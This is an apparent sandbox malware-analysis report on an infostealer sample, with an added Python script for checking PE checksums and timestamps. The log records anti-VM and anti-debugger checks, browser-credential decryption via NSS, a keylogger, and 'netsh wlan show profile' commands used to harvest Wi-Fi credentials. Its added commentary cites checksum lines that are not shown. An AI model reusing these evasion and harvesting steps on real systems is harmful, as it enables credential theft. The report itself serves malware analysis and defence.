                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
(the same NOOPENFILEERRORBOX observation is recorded 72 more times for JOUNLV.exe)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
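The three checksum lines and the 2095 build timestamp earlier in this section are cheap static triage signals that are easy to reproduce on any sample. The Python below is an added example, not code from the report or from Joe Sandbox: it recomputes the PE CheckSum with the documented loader algorithm (ones'-complement sum of the file's 16-bit words, skipping the CheckSum field itself, folded to 16 bits, plus the file length), compares it with the stored value, and flags a COFF TimeDateStamp that lies in the future. The build_minimal_pe helper constructs a 312-byte header-only skeleton (not a loadable executable) so the example runs offline, and the 24-hour future tolerance is an assumption. One caveat for reading the report: Windows only enforces the checksum for kernel-mode images, so a zero or wrong CheckSum in a user-mode binary is produced by ordinary toolchains as well as by malware builders and should be weighed together with the other indicators, not on its own.

```python
# Added example (not from the Joe Sandbox report): recompute the PE CheckSum
# and sanity-check the COFF timestamp, the two header facts flagged above.
import struct
import time


def pe_header_offsets(data: bytes):
    """Return (pe_sig_offset, checksum_field_offset, timestamp_field_offset)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file: bad PE signature")
    coff = pe + 4          # IMAGE_FILE_HEADER (20 bytes)
    opt = coff + 20        # IMAGE_OPTIONAL_HEADER; CheckSum sits at +0x40 in PE32 and PE32+
    return pe, opt + 0x40, coff + 4


def pe_checksum(data: bytes) -> int:
    """Checksum as the Windows loader computes it (MapFileAndCheckSumW):
    ones'-complement sum of all 16-bit words except the CheckSum field,
    folded to 16 bits, plus the file length."""
    _, cksum_off, _ = pe_header_offsets(data)
    padded = data + b"\0" * (len(data) % 2)   # an odd trailing byte is zero-extended
    total = 0
    for off in range(0, len(padded), 2):
        if off in (cksum_off, cksum_off + 2):
            continue
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)          # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def stored_checksum(data: bytes) -> int:
    """The CheckSum value written in the optional header (Joe Sandbox calls it the real checksum)."""
    _, cksum_off, _ = pe_header_offsets(data)
    return struct.unpack_from("<I", data, cksum_off)[0]


def timestamp_is_plausible(data: bytes, now=None, max_future_s=86_400):
    """False when TimeDateStamp is more than max_future_s ahead of 'now'
    (the report's 0xEBE8C2F3 decodes to June 2095). The tolerance is an assumption."""
    _, _, ts_off = pe_header_offsets(data)
    ts = struct.unpack_from("<I", data, ts_off)[0]
    now = time.time() if now is None else now
    return ts <= now + max_future_s, ts


def report(data: bytes, now=None) -> dict:
    """Same two facts the sandbox prints: stored vs recomputed checksum, and the timestamp."""
    real = pe_checksum(data)
    stored = stored_checksum(data)
    ts_ok, ts = timestamp_is_plausible(data, now)
    return {"stored_checksum": stored, "computed_checksum": real,
            "checksum_ok": stored == real, "timestamp": ts, "timestamp_ok": ts_ok}


def build_minimal_pe(stored: int = 0, timestamp: int = 0) -> bytes:
    """Constructed 312-byte PE32 header skeleton (DOS header, PE signature,
    COFF header, zeroed optional header). Not loadable; only for offline tests."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x014C, 0, timestamp, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 0x40, stored)                      # CheckSum field
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe()
    for key, val in report(blob).items():
        print(f"{key}: {val:#x}" if isinstance(val, int) and not isinstance(val, bool) else f"{key}: {val}")
```

Run it with a sample path to get the stored and recomputed checksum in the same terms the report uses; the skeleton, like the two dropped files above, has a stored checksum of 0 and so fails the comparison, while its recomputed value is unaffected by whatever is written in the CheckSum field.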

                          Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Memory allocated: 1BB36520000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Memory allocated: 1BB4FE20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 597634
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 595308
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 595191
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 595068
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 594926
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 594875
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Window / User API: threadDelayed 4664
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Window / User API: foregroundWindowGot 1771
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Window / User API: threadDelayed 3167
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Window / User API: threadDelayed 6570
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | API coverage: 5.1 %
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe TID: 5252 | Thread sleep time: -46640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -597634s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99764s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -98780s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -98671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -98561s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -98453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -98298s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -98125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -97989s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -97859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -595308s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -595191s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -595068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -594926s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -594875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99598s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe TID: 5300 | Thread sleep time: -99067s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
(the same Win32_Processor query is recorded 9 more times for JOUNLV.exe)
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Thread sleep count: Count: 4664 delay: -10
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 597634
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99764
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99656
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99546
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99437
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99328
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99218
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99109
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99000
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 98780
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 98671
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 98561
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 98453
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 98298
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 98125
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 97989
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 97859
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 595308
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 595191
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 595068
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 594926
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99862
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99735
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99598
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99438
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99313
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99187
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Thread delayed: delay time: 99067
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA 3D
Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Video
Source: JOUNLV.exe, 00000001.00000002.2023007732.000001BB50803000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: JOUNLV.exe.0.drBinary or memory string: vmware
                          Source: JOUNLV.exe.0.drBinary or memory string: vmicshutdown
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
                          Source: JOUNLV.exe, 00000001.00000002.2021806149.000001BB50699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                          Source: JOUNLV.exe.0.drBinary or memory string: vmicvss
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware svga 3d
                          Source: JOUNLV.exe, 00000001.00000002.2014857223.000001BB362CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, Info.txt.1.drBinary or memory string: VirtualMachine: False
                          Source: JOUNLV.exe, 00000001.00000002.2021806149.000001BB50660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drBinary or memory string: VirtualMachine:
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}3%j
                          Source: JOUNLV.exe.0.drBinary or memory string: vmicheartbeat
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeAPI call chain: ExitProcess graph end nodegraph_0-83556
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: JOUNLV.exe.0.dr, Decryptor.cs | Reference to suspicious API methods: WinApi.LoadLibrary(sPath + "\\mozglue.dll")
Source: JOUNLV.exe.0.dr, Decryptor.cs | Reference to suspicious API methods: WinApi.GetProcAddress(_hNss3, "NSS_Init")
Source: JOUNLV.exe.0.dr, Keylogger.cs | Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Process created: C:\Users\user\AppData\Local\Temp\JOUNLV.exe "C:\Users\user\AppData\Local\Temp\JOUNLV.exe"
Source: C:\Users\user\Desktop\LKxcbzlwkz.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" "
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\openfiles.exe OPENFILES
